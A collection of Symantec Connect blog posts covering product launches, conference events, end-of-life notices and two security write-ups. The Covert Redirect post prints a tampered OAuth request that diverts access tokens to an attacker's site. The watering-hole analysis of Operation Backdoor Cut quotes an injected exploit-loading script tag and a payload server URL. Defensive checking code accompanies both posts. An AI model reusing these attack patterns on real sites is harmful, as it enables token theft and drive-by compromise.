Channel: Symantec Connect - Blog Entries

eiPower Saver Solution Promotion for Vision 2014

Electricity costs have risen 4.2% per year for the past decade according to the Department of Labor.

Leverage your Symantec Management Platform, make Patch and Anti-Virus 100% more effective, and reduce the cost of doing business by implementing eiPower Saver Solution for SMP 7.1 and 7.5.

And to make a good deal even better, get up to 30% off your SMP 7.5 migration when you purchase eiPower.  Please visit the Intuitive or ITS booth for details, or contact Joe D'Agostino at joed@entisp.com.

ENTISP.COM


Enterprise Vault 11 Download Links

Hi all

As some of you may be aware, Enterprise Vault 11 shipped on the 5th May. The official announcement is available here: http://www.symantec.com/connect/blogs/enterprise-vault-11-now-available

The product media download is available on FileConnect: https://fileconnect.symantec.com

I’m pleased to announce the following collateral related to the launch:

General

Enterprise Vault 11 Product Documentation: http://www.symantec.com/docs/DOC6634

Enterprise Vault IMAP Access Launch page: http://www.symantec.com/docs/DOC6624

Benefits of upgrading to Enterprise Vault 11: http://www.symantec.com/docs/DOC7164

Enterprise Vault 11 Compatibility Guide: http://www.symantec.com/docs/TECH38537

Enterprise Vault 11 Performance Guide: http://www.symantec.com/docs/TECH125795

Whitepapers

PST Migrations with Enterprise Vault 11: http://www.symantec.com/docs/DOC6625

Deploying IMAP Access with Enterprise Vault 11: http://www.symantec.com/docs/DOC7122

SQL Best Practice Guide for Enterprise Vault 11: http://www.symantec.com/docs/DOC6863

Feature briefings

Enterprise Vault 11: Storage Safety Copies: http://www.symantec.com/docs/DOC7386

Enterprise Vault 11: Enterprise Vault IMAP Access: http://www.symantec.com/docs/DOC7387

Enterprise Vault 11: Enterprise Vault Search: http://www.symantec.com/docs/DOC7388

Enterprise Vault 11: Enterprise Vault PST Migration Enhancements: http://www.symantec.com/docs/DOC7389

Enterprise Vault 11: Enterprise Vault SCOM Enhancements: http://www.symantec.com/docs/DOC7390

 

Kind Regards

Dan

Symantec App Center 4.4 - now with Norton Mobile Security

Symantec would like to announce the release of App Center version 4.4. The Symantec App Center 4.4 release allows IT to confidently embrace Android in the enterprise and improves security for email and app access. This release delivers integrated threat protection for Android and support for the Android 4.4 operating system. It also includes Secure Email and App Proxies for control of network access policies and compliance. These new features and others are available now as an upgrade in your App Center console.

Summary of New Features

  1. Confidently embrace Android in the enterprise
  2. Improved email and app security
  3. Improved usability in admin console

Feature Highlights

1.  Confidently embrace Android in the enterprise

  • Integrated mobile threat protection
    • Protects Android users from privacy risks, mobile malware, greyware, fraudulent websites and more
    • Leverages Norton Mobile Insight, a dynamic intelligence system that analyzes every app in more than 200 app stores
    • Offers single-console management of threat protection, apps and devices
  • Android 4.4 Support
    • Delivers device management and app protection for the latest Android OS

2.  Improved email and app security

  • Secure app proxy
    • Improves employee productivity by safely extending enterprise resources to mobile apps and Symantec Secure Browser app
    • Secures app data in transit with per-app SSL, FIPS 140-2 tunnel
    • Eliminates need for firewall changes or complete device VPN
    • Separates corporate data traffic from personal data traffic
  • Secure email proxy
    • Eliminates need for firewall holes
    • Enforces access control policies for users, devices and apps
    • Verifies device compliance before devices are allowed to connect
    • Provides end-to-end email security when used with Symantec Secure Email app

3.  Enhanced Usability

  • Provides a snapshot of users registered, apps released, types of devices, and alerts.

 

Additional Features for Symantec App Center

  • App Center now supports using iOS B2B Volume Purchase Program – Managed Distribution (VPP) apps either as Symantec Sealed apps or B2B pointer apps.
  • Added App Center API support, including REST-based API and user and group creation API.

Technical Support

We value your business and are committed to customer care.  Please contact us if we can assist or answer any questions: www.symantec.com/business/support/. You can also visit the Symantec App Center Knowledge Base.

 

Don’t forget to follow us on Twitter: @SYMCmobility

Are you ready to Upgrade to Symantec NetBackup™ 7.6?

Tools and Resources to Streamline the Upgrade Process

Learn about the tools and resources available in upgrading to NetBackup 7.6

Vision Hits Its Stride

Day 2 - Everything Vision Has to Offer

Keynote Preview

On day one, Symantec’s top experts will join forces with a special surprise guest to put some unexpected new twists on what it means to enable agile data centers, support evolving endpoints and embrace proactive cyber security. The Vision 2014 opening keynote starts at 9:00 a.m., so make sure you head over to the Colosseum right after breakfast. If you’re seated by 8:45 a.m., you might even win a great prize at our Early Bird drawing.

Get Your Carnival On

Play like a kid—and eat, drink and win like a grown-up! Tonight, we ramp up the energy with an upscale carnival-style party that includes plenty of food and drink—along with some festive games and entertainment. As you settle in, electronic caricature artists will be standing by to capture your best features, and the first 1,000 people to visit with Sponsors in the Expo Hall will receive a High Roller pass, good from 8:30 pm – 1:30 am on Tuesday. This is a complimentary ticket to the hottest new attraction in Vegas—the largest observation wheel in the world. Even better, it’s conveniently located across the street from Caesars Palace in The Linq. 

Win A VIP Trip to an Exotic Destination!

Are you ready for a world-class VIP vacation? Earn your chance to win by visiting our Virtual Passport Sponsors or collecting Vision mobile app points. When you have enough scans or points, stop by the InfoCentral counter in the Expo Hall to receive a cool t-shirt, participate in daily contest drawings, and become eligible for the big Vision New Horizons grand prize giveaway, which will take place during Thursday’s closing keynote. 

Vision Goes Green

Support our efforts to reduce, reuse and recycle throughout the Vision Conference! Make sure to use the refillable water bottle in your bag, compliments of SlashDot Media. Then throughout the rest of the week, take the time to donate any unwanted conference materials—including used paper, notebooks, pens, badge holders and backpacks—to the Teacher EXCHANGE organization. All of your donated materials will be repurposed and put to good use in local schools. When you’re ready to donate, look for the yellow school bus collection box by the Conference Services desk. 

 

Covert Redirect Is an OAuth Flaw, Not a Second Heartbleed

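No sooner had the commotion over the Heartbleed vulnerability begun to settle than a security flaw called "Covert Redirect" was found, and reports of it are now filling the media. Some coverage even calls it "the second Heartbleed," but Covert Redirect is not actually as serious as Heartbleed.

Is it correct to call it "the second Heartbleed"?

No. This is a security flaw found in service providers' implementations of OAuth.

Why is Covert Redirect not as serious as Heartbleed?

Heartbleed is a serious vulnerability in OpenSSL. OpenSSL is an open source implementation of the SSL and TLS cryptographic protocols and is used by more than 500,000 websites. The Heartbleed vulnerability can be exploited simply by sending a request to an unpatched server, whereas with Covert Redirect an attacker must find a susceptible application and then obtain interaction and permissions from the user.

What is Covert Redirect?

Covert Redirect is a security flaw, not a vulnerability. It targets third-party clients that are susceptible to an open redirect.

For example, an attacker can use an application on a susceptible site to covertly send a request to the service provider's API with a tampered redirect_uri parameter. Once authentication succeeds, the tampered, malicious redirect_uri parameter redirects the user to a malicious site.

Standard request: [provider]/dialog/oauth?redirect_uri=[vulnerable site]&scope=email&client_id=123&response_type=token

Malicious request: [provider]/dialog/oauth?redirect_uri=[vulnerable site]/redirectKeepParams?w=1dpoa&url=[attacker's site]&scope=email&client_id=123&response_type=token

In the malicious request, the attacker, rather than the approved application, receives the user's access token.

What is OAuth?

OAuth is an open protocol that allows secure authorization to be obtained from web, mobile, and desktop applications. When OAuth is used, for example through a "Log in with Facebook" button, it acts as the authorization mechanism and lets the third-party application obtain access to the user's account.

What is the risk to users?

Exploiting this flaw requires interaction from the user. To compromise an access token, the attacker needs the user to grant permissions to the susceptible application. Only once permission has been granted can the attacker obtain the user's account data and use it for further malicious purposes.

What is the impact on application developers?

If a website uses an open redirect, an attacker may target that application for Covert Redirect, so open redirects on the website need to be shut off. Service providers also recommend that application developers create a whitelist of OAuth redirect URLs.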
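
The two mitigations named above, a redirect URL whitelist at the provider and closing the open redirect on the client site, can be shown side by side. The Python below is an added example, not code from the original post or from any provider; the hosts provider.example, client.example and attacker.example, the registration table, and all function names are constructed for illustration.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Constructed registration table: redirect URIs each client_id registered
# with the provider (hypothetical hosts throughout).
CALLBACK = "https://client.example/oauth/callback"
REGISTERED_REDIRECTS = {"123": {CALLBACK}}

# Hosts the client application itself is willing to redirect to (constructed).
CLIENT_HOSTS = {"client.example"}


def build_request(redirect_uri):
    """Build an authorization request shaped like the two requests above."""
    query = urlencode({"redirect_uri": redirect_uri, "scope": "email",
                       "client_id": "123", "response_type": "token"})
    return "https://provider.example/dialog/oauth?" + query


STANDARD_REQUEST = build_request(CALLBACK)
MALICIOUS_REQUEST = build_request(
    "https://client.example/redirectKeepParams?w=1dpoa&url=https://attacker.example/")


def host_only_check(client_id, redirect_uri):
    """Weak provider check: any URL on a registered host is accepted."""
    host = urlsplit(redirect_uri).hostname
    registered = REGISTERED_REDIRECTS.get(client_id, set())
    return host is not None and any(urlsplit(r).hostname == host for r in registered)


def exact_match_check(client_id, redirect_uri):
    """Whitelist check: the full redirect_uri must equal a registered value."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def authorize(request_url, check):
    """Return the redirect_uri the provider would send the token to, or None."""
    params = parse_qs(urlsplit(request_url).query)
    client_id = params.get("client_id", [""])[0]
    redirect_uri = params.get("redirect_uri", [""])[0]
    return redirect_uri if check(client_id, redirect_uri) else None


def safe_redirect_target(url, default="/"):
    """Client-side fix: a redirect endpoint only follows same-site targets."""
    # Browsers treat "\" like "/" and drop control characters, so reject both.
    if "\\" in url or any(ord(c) < 0x20 for c in url):
        return default
    parts = urlsplit(url)
    if parts.scheme in ("http", "https") and parts.hostname in CLIENT_HOSTS:
        return url
    # Plain site-relative path; "//host/..." has a netloc and is refused.
    if not parts.scheme and not parts.netloc and url.startswith("/"):
        return url
    return default


if __name__ == "__main__":
    for name, request in (("standard", STANDARD_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        print(name, "host-only:", authorize(request, host_only_check))
        print(name, "exact    :", authorize(request, exact_match_check))
    print(safe_redirect_target("https://attacker.example/"))
```

The host-only check passes the tampered request because the redirect endpoint lives on the registered host; the exact-match whitelist rejects it, and the hardened redirect endpoint refuses the off-site target even if the provider check is weak.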

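What are the next steps?

Covert Redirect is a security flaw to be aware of, but it is not on the same level as Heartbleed. Users should judge carefully which applications they grant access to, and Covert Redirect is a good reminder of that.

Do not expect a patch to be released. It is up to each service provider to secure its own implementation and deal effectively with the Covert Redirect flaw.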

 

* To subscribe to the RSS feed of the Japanese-language Security Response blog, visit http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja.

Fill Your Brain, Then Rock Out!

Vision Day 3 - Wednesday

Symantec Vision day 3 begins with another great keynote in the morning and a sidesplitting performance and party at night. And of course, you can also look forward to another productive day of sessions, labs, and activities in between. 

Keynote Preview

Yesterday’s keynote focused on what it means to enable agile data centers, support evolving endpoints, and embrace proactive cyber security. Today, the discussion expands with two in-depth roundtables, featuring panels of Symantec thought leaders, customers and partners.

Embrace Your Inner Traveler at the Pre-Party Reception

Don’t miss this chance to take a trip around the world without leaving the Expo Hall—with a virtual tour of the tastes, sights and sounds of our upcoming Vision Symposiums in Japan, China, Dubai, Germany, France and South America. Make sure you take time to tweet or text photos of your favorite station, sample the selections of fine beer and wine, try a “Vision cocktail,” and prepare to rock out at the OneRepublic concert. Also, don’t miss out on the special prize drawing, where you could win a backstage pass to meet OneRepublic right before the concert! 

One Great Performance at the Wednesday Vision Party, Co-sponsored by HP

After the pre-party dinner reception in the Expo Hall, stroll over to the Colosseum for one amazing concert featuring OneRepublic, with multi-talented comedian Tommy Davidson as the opening act. Enjoy desserts and drinks before the concert starts and don’t forget that your Vision badge or guest pass is your only ticket into this exclusive event for Vision attendees and guests. If you qualify for VIP passes or floor access, you will need to show your VIP pass and/or wristband in addition to your conference badge. Attendees without a badge or ticket will not be granted entry to the concert, no exceptions. 

Win a VIP trip to an exotic locale!

FIND OUT MORE ABOUT THE VISION NEW HORIZONS PROMOTION

We’re Listening at the Customer Video Booth

STOP BY TO RECORD A 30 SECOND STORY ABOUT YOUR SYMANTEC EXPERIENCE

End of Life Announcement for Enterprise Vault 10

It might come as a bit of a shock to some people to see a title 'End of life for Enterprise Vault 10', but it seems it is mostly standard practice now that when Symantec release a new version of the product, they announce when the end of life will be for the previous version.

Don't worry, though: you won't need to rush out tomorrow and upgrade; there is plenty of time.

Take a look at the article from Symantec.


pcAnywhere EOL

Symantec pcAnywhere™ End-of-Life

Customer FAQ

What is happening?

Symantec is announcing the end-of-life (EOL) for the pcAnywhere™ product on May 5, 2014. There will be no replacement offering. The pcAnywhere™ Solution product which is included with the Symantec™ Client Management Suite product and the Symantec™ IT Management Suite product, is not affected by this announcement.

 

Why is Symantec EOLing pcAnywhere?

The pcAnywhere™ product has had no major releases for over seven years, which automatically initiates the Symantec EOL process. After careful evaluation, Symantec has chosen not to continue offering a stand-alone remote control product.

 

Will the pcAnywhere product have Windows 8 and Windows Server 2012 support before the End-of-Support Life (EOSL)?

No. Platform support will remain as is through the EOSL.

 

Will Symantec introduce another remote control product in the place of the pcAnywhere product?

At this time, Symantec has no plans to introduce a replacement remote control product.

 

Is the pcAnywhere Solution product affected by this announcement?

The pcAnywhere™ Solution product is included with the Symantec™ IT Management Suite product and the Symantec™ Client Management Suite product and is not affected by this announcement.

 

Is the pcAnywhere Solution product a good replacement option for pcAnywhere customers?

The pcAnywhere™ Solution product may be a viable replacement for customers with 500 or more computers who also need the Symantec™ IT Management Suite product or the Symantec™ Client Management Suite product. The pcAnywhere™ Solution product is only available in these Suites.

 

How does this announcement affect existing license purchases?

This EOL announcement does not impact your use of existing licenses for the pcAnywhere™ product. You may continue to use the pcAnywhere™ product in accordance with the terms of applicable license agreements and other agreements with Symantec.

 

How does this announcement affect support for the pcAnywhere product and current support agreements?

Symantec will provide support for the pcAnywhere™ product under current support agreements in accordance with the End of Life Policy for Symantec Business Products and the EOL timeline described below. Note that all support will end on the End of Support Life Date of November 3, 2015.

 

EOL timeline

  • End of Life: 5/5/2014
  • End of Availability: 11/3/2014
  • End of Support Life: 11/3/2015

 

Who should I contact with questions?

For any questions, please contact your Symantec Account Manager or call customer care at 800.721.3934 in the United States and Canada. For specific country offices and contact numbers, please visit www.symantec.com.

Operation Backdoor Cut Targeted Basketball Community with IE Zero-Day

Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.

Figure 1. JBA landing page

The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, a malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. On all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website, located in Seoul, South Korea, that hosted the exploit code. The following is an example of the script used in the attacks:

<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>

The compromised website, associated with a major Korean café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack because it belongs to a reputable business and would be unlikely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment, including the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also uses a cookie to check whether the browser has visited the page before. If the page has been visited before, the browser is not directed to the exploit code, as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for a different environment:

  • Windows XP – English (EN)
  • Windows XP - Japanese
  • Windows 7 with Office 2007 on a x86 computer
  • Windows 7 with Office 2010 on a x86 computer

If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:

https://login[dot]imicrosoft[dot]org/feed

Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the United States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.

Figure 2. Login screen of the VPS site

Either the attackers had a strategy to close shop quickly to keep their campaign short-lived, or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.

From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.
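
Because the injected loader and its cookie were named to look like part of the JBA site, a site owner looking for this kind of injection is better served by checking which hosts a page loads scripts from than by checking file names. The Python below is an added example, not code from Symantec's analysis; the hosts, the page markup, and the allowlist are constructed, and the function and class names are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a landing page with two expected scripts and one
# injected tag modelled on the redacted example shown earlier in the article.
PAGE_URL = "https://www.association.example/"
ALLOWED_SCRIPT_HOSTS = {"cdn.association.example"}
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script type="text/javascript" src="//cdn.association.example/lib/jquery.js"></script>
<SCRIPT TYPE="text/javascript" SRC="https://www.cafe-chain.example/uc/inc_jba.php"></SCRIPT>
<script>var inlineCode = 1;</script>
</head><body>...</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so upper-case
        # markup such as <SCRIPT SRC=...> is handled as well.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def unexpected_script_hosts(html, page_url, allowed_hosts):
    """Return (src, host) for each script loaded from a host that is neither
    the page's own host nor on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    allowed.add(urlsplit(page_url).hostname)
    findings = []
    for src in collector.sources:
        # Resolve relative and protocol-relative URLs the way a browser would.
        host = urlsplit(urljoin(page_url, src)).hostname
        if host is None or host not in allowed:
            findings.append((src, host))
    return findings


if __name__ == "__main__":
    for src, host in unexpected_script_hosts(SAMPLE_PAGE, PAGE_URL, ALLOWED_SCRIPT_HOSTS):
        print("unexpected script host:", host, "<-", src)
```

Since the site in the article was re-injected three times, a check like this is most useful when run on a schedule against the live page rather than once after cleanup.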

Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.

The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.

Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude into the network.

Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

AV

IPS

Operation Backdoor Cut: Targeting the Basketball Community by Exploiting an IE Zero-Day Vulnerability

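In March of this year, Symantec blogged about a possible watering hole attack exploiting a zero-day vulnerability in Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). Symantec continued to investigate this attack, concluded that its purpose was to target users associated with the Japanese basketball community, and named it Operation Backdoor Cut. We were able to draw this conclusion because extended observation showed that the watering hole attack exploiting this vulnerability was hosted only on the landing page of the official website of the Japan Basketball Association (JBA). Since the zero-day vulnerability was confirmed in March, Symantec's telemetry has not confirmed attacks on any other website.

Figure 1. JBA landing page

The JBA website was first compromised in mid-February. A malicious script was injected into the site's HTML code, and this script loaded exploit code from an external site in the background. The site then appeared to have been cleaned up, but it was compromised again in late February and a similar script was injected. Then, just hours after the patch for CVE-2014-0324 was released as part of Microsoft's monthly patches on March 11, a malicious script was injected for a third time. On all three occasions, what was injected into the JBA site was a short script that redirected traffic to yet another compromised website, which hosted the exploit code. This website is located in Seoul, South Korea. The following is an example of the script used in the attack:

<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>

The compromised website that actually hosted the exploit code is associated with a major Korean café chain. For each of the three compromises, the files were stored in a different directory on this site. The site was probably chosen to host the main part of the attack because it belongs to a well-known company and is unlikely to draw suspicion from security products or services monitoring an organization's network. The files contained in each directory are as follows: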

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

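The short script injected into the JBA website leads to the file inc_jba.php. This file contains JavaScript that checks information about the targeted user's computer environment, such as the operating system (OS) version, the OS language, and the installed version of Microsoft Office. The JavaScript also uses a cookie to check whether the browser has visited the page before. If it has, the browser is not directed to the exploit code, as a precaution in case the user is a security researcher. If the computer environment meets the specified conditions, the browser is redirected to one of four exploit pages. Four variants of the exploit code have been prepared for different environments:

  • Windows XP - English (EN)
  • Windows XP - Japanese
  • Windows 7 with Office 2007 installed on an x86 computer
  • Windows 7 with Office 2010 installed on an x86 computer

If it executes successfully, the exploit code downloads inc_module.jpg from the same directory and processes it to obtain the URL of the final payload. Although the extension is .jpg, this is not an image file but a data file containing encrypted information about the location of the payload. The browser is then redirected to another server located in Seoul, which we believe the attacker set up to encrypt network traffic with the SSL protocol. The URL of the Seoul-based server is as follows:

https://login[dot]imicrosoft[dot]org/feed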

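It is worth noting that this site was maintained on a virtual private server (VPS) rented from a company based in Beijing. This company appears to be in the business of providing VPSs located in the United States and South Korea. It is fairly safe to assume that this provider was chosen because of the server's geolocation, since the geo-IP location of the server hosting the payload must have been critical to the attack's success.

Figure 2. Login screen of the VPS site

The attackers either adopted a strategy of pulling out early and ending the campaign quickly, or devised a sophisticated technique to prevent security researchers from downloading the payload. Either way, we were unable to obtain the payload from this server.

As far as Symantec has been able to confirm, the sole motive of Operation Backdoor Cut appears to have been to use the JBA as a watering hole site and draw traffic from it, because no other websites were affected at all. The name of the malicious script file (inc_jba.php) and the name of the cookie used to count accesses to the page (JBA20140312v2) are both disguised to look like part of the JBA page. All of the detections Symantec observed for this exploit came from traffic from the JBA website.

Why the Basketball Community Was Targeted
Some may wonder why the Japanese basketball community was targeted this time. The sporting world has deep ties with both the nation and its government, and basketball is no exception. There is a rather interesting connection between the Japanese basketball community and the Japanese government. The president of the JBA is Japan's current Deputy Prime Minister and Minister of Finance. He is also a former prime minister. A relationship like this may be the motive for the watering hole attack on the JBA site. In other words, the JBA website may have been seen as a good entry point or gateway into the Japanese government.

The Olympics may also be a motive. As one of the major sports organizations, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games, the organizing body of the Tokyo 2020 Olympics. It is well known that Olympic organizations are frequent targets of cyberespionage. For example, data from a 2011 investigation into an attack named Operation Shady RAT showed that several Olympic organizations were attacked and computers on their networks were compromised. The Japanese Olympic Committee (JOC) was one of the victims. Last year, Japan was chosen to host the 2020 Olympic Games and is now preparing for them. Japan is well aware that the honor of hosting the Olympics may come with an increase in cyberattacks. In fact, the Japanese government held a cybersecurity drill in March in preparation for the Games, to be held six years from now. However, the attacks may already have begun, and may even have started long before this drill.

Sectors such as government, manufacturing, and finance tend to be targeted, but every industry faces the risk of a targeted attack. It is important to recognize this and protect networks accordingly. Companies and organizations need to stay prepared and have measures in place in case attackers do get into the network.

Symantec provides the following detection definitions to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

Antivirus

Intrusion Prevention System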

 


Demand Generation Materials for Emerging Markets - IT Trends

Capitalize On The Market’s Rapid Adoption Of Mobile Devices

Drive increased revenue and become your customers’ trusted advisor by providing the integrated mobile management, protection, and security solutions they need to confidently deliver and manage applications to users anywhere, anytime.

 

Increase Revenue by Helping Customers Realize the Promise of Virtualization

Help your customers take decisive steps in extending the benefits of virtualization to even their most business-critical applications and build desired private cloud services on existing infrastructure that are both secure and compliant.

Learn about the latest trends and best practices in selling virtualization solutions.

 

What's included in the Backup Exec V-Ray Edition?

Today I received an email from one of our channel partners and his question was: "I'm not 100% clear on what is included in V-Ray and how it's licensed. Let's say I have 3 VMware hosts running a total of 1 million virtual machines.  Each host has 2 Quad-Core CPUs.  I simply purchase a 6-socket license V-Ray, correct? Another one - are there any special application agents that V-Ray does not include?  And if that's true, do I simply purchase "Agent X" just like I would for Backup Exec?  The same goes for options - if I need an NDMP agent, I would purchase that add-on in the exact same way for standard Backup Exec?"

If you have also been wondering how the V-Ray Edition differs from standard Backup Exec, or maybe you have been trying to find the answers to the same questions listed above, then this blog is for you. I am going to briefly describe the V-Ray Edition and how it’s licensed while covering the basics of standard Backup Exec with respect to the differences between the two offerings. My goal is to answer the questions outlined above and in doing so provide further insight into the Backup Exec V-Ray Edition.

Backup Exec V-Ray Edition

The Backup Exec V-Ray Edition is designed exclusively for virtual environments. Ultimately, with the Backup Exec V-Ray Edition you get all the software you need to completely protect your virtual environment at a very attractive price. Plus, the capabilities of the V-Ray Edition can easily be expanded to protect physical servers too!

The Backup Exec V-Ray Edition is licensed per socket and includes the following software components:

  • Backup Exec Media Server (x1 license)
  • Backup Exec Agent for VMware and Hyper-V (unlimited licenses)
  • Agent for Applications and Databases (unlimited licenses)
    • Exchange
    • SQL
    • SharePoint
    • Active Directory
    • Oracle
    • Lotus Domino
    • Enterprise Vault
  • Backup Exec Deduplication Option (x1 license)

The Agent for VMware and Hyper-V “switches on” the integration with VMware APIs for Data Protection (VADP) and Microsoft VSS, which enables fast, high performance snapshots of the virtual disks attached to VMs. The Agent for Applications and Databases enables granular recovery of Microsoft applications. You do not need to buy additional agents or options for application protection in a virtual environment since they are already included with the V-Ray Edition.

All other Backup Exec agents and options in the Backup Exec portfolio (e.g., Enterprise Server Option) can be added to your Backup Exec V-Ray purchase by purchasing them in exactly the same way as for standard Backup Exec.

To extend protection of the V-Ray Edition to physical servers, you simply purchase one Backup Exec Agent for Applications and Databases for each physical Application or Database server you wish to protect. In addition, the Backup Exec Media Server and Deduplication Option included in the V-Ray Edition can be used to protect your physical servers. You don’t have to re-license these for your physical environment. The only additional software you need to purchase to protect physical servers is the Agent for Applications and Databases as mentioned above. However, you may decide to extend the functionality of Backup Exec by adding on additional Backup Exec Agents and Options. For example: Virtual Tape Library Unlimited Drive Option, Enterprise Server Option, Exchange Email Archiving Option, etc.

If we quickly take a look back at the question: “I have 3 VMware hosts running a total of 1 million virtual machines. Each host has 2 Quad-Core CPUs. I simply purchase a 6-socket license V-Ray, correct?” The answer is yes. There are 2 sockets per host and a total of 3 hosts. That means you would purchase 6 licenses of the Backup Exec V-Ray Edition. Since Backup Exec protects an unlimited number of guest machines per host, it doesn't make a difference if you have 1 or 100 virtual machines per host machine. Backup Exec will protect them all. There is also no limit on the number of hosts you can protect. You simply count the number of sockets in the environment you wish to protect and purchase the corresponding number of V-Ray licenses. So with the V-Ray edition, you really can protect everything in your environment with a per socket licensing method.

If you wanted to buy standard Backup Exec to protect your virtual environment (by standard I mean purchasing Backup Exec via the a la carte licensing model), you would simply purchase:

  • One Backup Exec Media Server license for each media server
  • One VMware and Hyper-V agent per host machine
  • Plus, one agent for applications and databases for every application in the virtual host for granular recovery capabilities

All other Backup Exec Agents and Options such as the Deduplication Option can be purchased in the usual way.

The recovery options available with the V-Ray or standard edition include:

  • Protection for All Physical Servers
    • Full system recovery
    • Application and database recovery
    • File and folder recovery
  • Protection for All Virtual Machines
    • Full VM recovery
    • VMDK recovery
    • Application and database recovery
    • File and folder recovery
  • Application Data Granular Recovery in both virtual and physical environments
    • Exchange
    • SQL
    • Active Directory
    • SharePoint

If you have any additional questions, you can reply to this blog, or find me on Twitter at @KateJLewis or @BackupExec

Thanks for reading.

Kate 

What IS an Agile Data Center?

Connect Dev Notes: 14 May 2014


Updates deployed to the Connect production servers as a result of the code sprint that ended 13 May 2014.

User Facing: Desktop

  • Added code to search results pages so each result displays the "posted on" date rather than the "updated on" date.
  • Fixed a few issues with the Accreditation and Certification update scripts that were keeping new data from flowing into the profile pages of Connect users.
  • Refactored the 'short summaries' blog code so it does not use the short summaries on blog overview pages.
  • Updated the presentation template used for Vision presentations to use the updated 2014 version.
  • Fixed a rendering issue with content submitted with the <code> tag.
  • Added code that hides the public/private checkbox from users who are not members of any groups.
  • Added code to notifications system for post-by-email users that does not print the username at the top of notifications if the username matches the contents of the First name and Last name profile fields.
  • Fixed an issue users were having when viewing a Japanese post and were unable to switch to the English version of the target post.
  • Added a "Reddit" share widget to posts.
  • Fixed an issue with inconsistent RSS paths.

Admin Facing

  • Added code to the Akamai cache clearing tool that will give admins more feedback when they submit target pages to be cleared from the Akamai caches.
  • Added an "Upcoming Events" block to the right sidebar that is configured to display community-specific events on related community pages.

SEO Wins

